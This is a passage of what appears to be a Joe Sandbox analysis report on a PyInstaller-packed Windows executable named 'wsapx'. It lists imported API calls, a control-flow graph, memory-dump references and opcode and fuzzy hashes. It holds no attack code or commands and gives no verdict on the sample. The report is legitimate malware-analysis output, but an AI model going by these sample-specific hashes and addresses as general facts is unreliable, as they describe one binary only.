                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction ID: 7d25f7ac8a3c166c1bdede6ca0dbec049a34941688e647fd4765907fde19d170
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C218C61A0864287E610BF10F4552EAA261EFC8BA0FC44032EE4D43786DF3CD90687A0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 963 7ff7c71ccfd0-7ff7c71ccff5 964 7ff7c71cd2c3 963->964 965 7ff7c71ccffb-7ff7c71ccffe 963->965 966 7ff7c71cd2c5-7ff7c71cd2d5 964->966 967 7ff7c71cd000-7ff7c71cd032 call 7ff7c71ca884 965->967 968 7ff7c71cd037-7ff7c71cd063 965->968 967->966 970 7ff7c71cd065-7ff7c71cd06c 968->970 971 7ff7c71cd06e-7ff7c71cd074 968->971 970->967 970->971 973 7ff7c71cd084-7ff7c71cd099 call 7ff7c71d398c 971->973 974 7ff7c71cd076-7ff7c71cd07f call 7ff7c71cc390 971->974 978 7ff7c71cd1b3-7ff7c71cd1bc 973->978 979 7ff7c71cd09f-7ff7c71cd0a8 973->979 974->973 980 7ff7c71cd210-7ff7c71cd235 WriteFile 978->980 981 7ff7c71cd1be-7ff7c71cd1c4 978->981 979->978 982 7ff7c71cd0ae-7ff7c71cd0b2 979->982 983 7ff7c71cd240 980->983 984 7ff7c71cd237-7ff7c71cd23d GetLastError 980->984 985 7ff7c71cd1c6-7ff7c71cd1c9 981->985 986 7ff7c71cd1fc-7ff7c71cd20e call 7ff7c71cca88 981->986 987 7ff7c71cd0c3-7ff7c71cd0ce 982->987 988 7ff7c71cd0b4-7ff7c71cd0bc call 7ff7c71c4830 982->988 992 7ff7c71cd243 983->992 984->983 993 7ff7c71cd1cb-7ff7c71cd1ce 985->993 994 7ff7c71cd1e8-7ff7c71cd1fa call 7ff7c71ccca8 985->994 1007 7ff7c71cd1a0-7ff7c71cd1a7 986->1007 989 7ff7c71cd0df-7ff7c71cd0f4 GetConsoleMode 987->989 990 7ff7c71cd0d0-7ff7c71cd0d9 987->990 988->987 996 7ff7c71cd1ac 989->996 997 7ff7c71cd0fa-7ff7c71cd100 989->997 990->978 990->989 999 7ff7c71cd248 992->999 1000 7ff7c71cd254-7ff7c71cd25e 993->1000 1001 7ff7c71cd1d4-7ff7c71cd1e6 call 7ff7c71ccb8c 993->1001 994->1007 996->978 1005 7ff7c71cd106-7ff7c71cd109 997->1005 1006 7ff7c71cd189-7ff7c71cd19b call 7ff7c71cc610 997->1006 1008 7ff7c71cd24d 999->1008 1009 7ff7c71cd260-7ff7c71cd265 1000->1009 1010 7ff7c71cd2bc-7ff7c71cd2c1 1000->1010 1001->1007 1012 7ff7c71cd114-7ff7c71cd122 1005->1012 1013 7ff7c71cd10b-7ff7c71cd10e 1005->1013 1006->1007 1007->999 1008->1000 1015 7ff7c71cd293-7ff7c71cd29d 1009->1015 1016 7ff7c71cd267-7ff7c71cd26a 1009->1016 1010->966 1020 7ff7c71cd124 1012->1020 1021 7ff7c71cd180-7ff7c71cd184 1012->1021 1013->1008 1013->1012 1018 7ff7c71cd2a4-7ff7c71cd2b3 1015->1018 1019 7ff7c71cd29f-7ff7c71cd2a2 1015->1019 1022 7ff7c71cd283-7ff7c71cd28e call 7ff7c71c4f34 1016->1022 1023 7ff7c71cd26c-7ff7c71cd27b 1016->1023 1018->1010 1019->964 1019->1018 1025 7ff7c71cd128-7ff7c71cd13f call 7ff7c71d3a58 1020->1025 1021->992 1022->1015 1023->1022 1029 7ff7c71cd141-7ff7c71cd14d 1025->1029 1030 7ff7c71cd177-7ff7c71cd17d GetLastError 1025->1030 1031 7ff7c71cd14f-7ff7c71cd161 call 7ff7c71d3a58 1029->1031 1032 7ff7c71cd16c-7ff7c71cd173 1029->1032 1030->1021 1031->1030 1036 7ff7c71cd163-7ff7c71cd16a 1031->1036 1032->1021 1033 7ff7c71cd175 1032->1033 1033->1025 1036->1032
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD0EC
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD177
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction ID: a26d259292c1d742ca6ba35c1b661ed6d895888781958de7865a86e3ed6bf798
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8091D872F2866197F750AFB5A44127DABA0BB84FA8F944139DE4E57A84CE38D443C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction ID: 3fa3712730203a21713272f923b36b88b47f3eb768463d7f2c27089bf2514277
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E541C822D1878183E310AF61A551379B760FBD4BB4F908334EA5C03AD1DF7CA5E28760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction ID: b51fe4a4f4d6e6491221dbb5985eeacbca90a5ed64967321097aa08276f2f87e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF314BA5E0824743FA64BF64B4623B99A919FC5FA4FC44434DD4E4B2D3DE2CE50786B0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                • Instruction ID: afc438902a9f3ef73e9e008cfa43491e2e0976f11f3fd3ce2b717cb854b39b2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3ED06714B0864653EA293FB078D907896526FD8F61B981438C84B06393DD6DE54A4720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction ID: 38bd95e9f4edfaad8ff504e530bdb76222f489bed8d80ab98bd67998b975b0b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D851D421B092414FE624AEA6A90067EE691BBC4FB4F945734DE6D477C5CE3CD4028620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction ID: 45cd257ebe968dedf8a9017d63e518e87f626e9994ae5da0e6065c9b46ba4dc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7611C461A18A4182DA20AF6AB844169A361BB85FF4F944335EE7D4B7D9CE7CD4528700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction ID: bb80073ab4e34203d482b92d8b1f0b610e16cf64405409afa22fc5c342af9738
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1E04F10E0820253FF167FF2788613896A06FD4F60F854034C91D822A1DE2C69878620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC36
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction ID: fcb1af7905ca4188874b991a65e92d67468ddf644b753bcdf3443fa653a7e908
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE216211B2C64243EAA57FA5B49527D92D2AFC4FF0F884235DA2E477C1DE6CA4878324
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction ID: 205d2de5721195348593361f256ffe3bf771015d63912b837573ae568e498404
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3741D732A0820187FA34AF99B541279F3A4EB95FA0F940131DB8E87791CF2DE503CB61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                • Opcode ID: 3444aa7209edb3b7be450d659aa5a443e70ab9b7aff340a2814dff51627c4016
                                                                                                                                                                                                                                                • Instruction ID: fac5da0a37711a33efb0f7be2c34fcc64e4431d87ee4fa977ff3b5c943acd697
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3444aa7209edb3b7be450d659aa5a443e70ab9b7aff340a2814dff51627c4016
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB217E61B1865287EB14BE6379043BAD691BF85FE8FC85430EE4D0B786CE7DE0428660
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction ID: fdfc1001f932569fa1f7ad15dc0e1ab766aca97bd891d72e38dd49d6acebaed0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F318F21A1864287E7627FD5A84137CAA50ABC0FB4FC50135EA6D833D2CE7CE5438730
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                • Instruction ID: 0a4e7d4745b2d85396fb4c1e03c75a07d4516985b98d4862219aefe3b6e96ccb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84218332A047858BEB25AFA4D4442EC77A0FB84F28F881635D65E06AD5DF38D546CB60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
